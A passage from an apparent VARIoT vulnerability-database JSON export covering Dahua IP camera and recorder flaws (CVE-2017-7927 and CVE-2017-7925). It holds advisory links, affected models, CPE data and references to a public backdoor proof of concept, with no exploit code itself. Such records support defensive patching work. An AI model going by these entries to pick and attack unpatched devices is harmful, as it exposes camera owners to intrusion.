            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:29:39.729000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cybersecurity Statement - March 6th 2017",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/en/us/single.php?nid=354"
          },
          {
            "title": "Cybersecurity Vulnerability Update - March 8 2017",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/en/us/single.php?nid=364"
          },
          {
            "title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (030617)",
            "trust": 0.8,
            "url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
          },
          {
            "title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (04032017)",
            "trust": 0.8,
            "url": "http://us.dahuasecurity.com/en/us/security-bulletin_04032017.php"
          },
          {
            "title": "Security Notification DHCC-201703-01",
            "trust": 0.8,
            "url": "http://www1.dahuasecurity.com/annoucementsingle/security-notification-dhcc-201703-01-112.html"
          },
          {
            "title": "Patch for Dahua Technology Authentication Authentication Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/93997"
          },
          {
            "title": "Repair measures for various UOB product security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99752"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-798",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-836",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-124-02"
          },
          {
            "trust": 2.3,
            "url": "http://www.securityfocus.com/bid/98312"
          },
          {
            "trust": 1.7,
            "url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7927"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7927"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu98841854/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor.txt"
          },
          {
            "trust": 0.8,
            "url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor-poc.py"
          },
          {
            "trust": 0.3,
            "url": "www.dahuasecurity.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-05-19T00:00:00",
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "date": "2017-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "date": "2017-05-06T00:00:00",
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "date": "2017-05-04T00:00:00",
            "db": "BID",
            "id": "98312"
          },
          {
            "date": "2017-06-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "date": "2017-05-06T00:29:00.460000",
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "date": "2017-04-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-06-27T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "date": "2017-05-23T16:23:00",
            "db": "BID",
            "id": "98312"
          },
          {
            "date": "2017-07-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "date": "2019-10-09T23:29:59.297000",
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua Technology Authentication Authentication vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201705-3743

    Vulnerability from variot - Updated: 2023-12-18 12:29

    A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. plural Dahua The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua DH-IPC-HDBW23A0RN-ZS is a camera product of Dahua Company of China. Dahua Technology is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. Attackers may exploit these issues to gain unauthorized access to restricted content by bypassing intended security restrictions or to obtain sensitive information that may aid in launching further attacks. Dahua DH-IPC-HDBW23A0RN-ZS, etc. There are security vulnerabilities in many Dahua products. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201705-3743",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "dh-ipc-hfw2xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr51a08he-s3",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr51a04he-s3",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw23a0rn-zs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-nvr1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-hcvr4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-hcvr5xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr58a32s-s2",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-sd6cxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hfw4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw23a0rn-zs",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw13a0sn",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw2xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw4xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-sd6cxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-nvr1xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-hcvr4xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-hcvr5xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr51a04he-s3",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr51a08he-s3",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr58a32s-s2",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw13a0sn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr58a32s-s2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dhi-hcvr51a08he-s3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dhi-hcvr51a04he-s3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-sd6cxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-nvr1xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hfw4xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hfw2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdbw23a0rn-zs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdbw13a0sn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-hcvr5xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-hcvr4xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdbw23a0rn zs",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh nvr1xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh hcvr4xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh hcvr5xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dhi hcvr51a04he s3",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dhi hcvr51a08he s3",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dhi hcvr58a32s s2",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdbw13a0sn",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdw1xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdw2xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdw4xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hfw1xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hfw2xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hfw4xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh sd6cxx",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "b9a8ca3d-8ac9-429c-880c-4cc25c09c01b"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-08192"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003971"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1045"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw23a0rn-zs:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw13a0sn_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw13a0sn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd6cxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd6cxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-nvr1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-nvr1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ddh-hcvr4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr5xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-hcvr5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a04he-s3_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a04he-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a08he-s3_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a08he-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr58a32s-s2_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr58a32s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-7925"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Bashis",
        "sources": [
          {
            "db": "BID",
            "id": "98312"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-7925",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
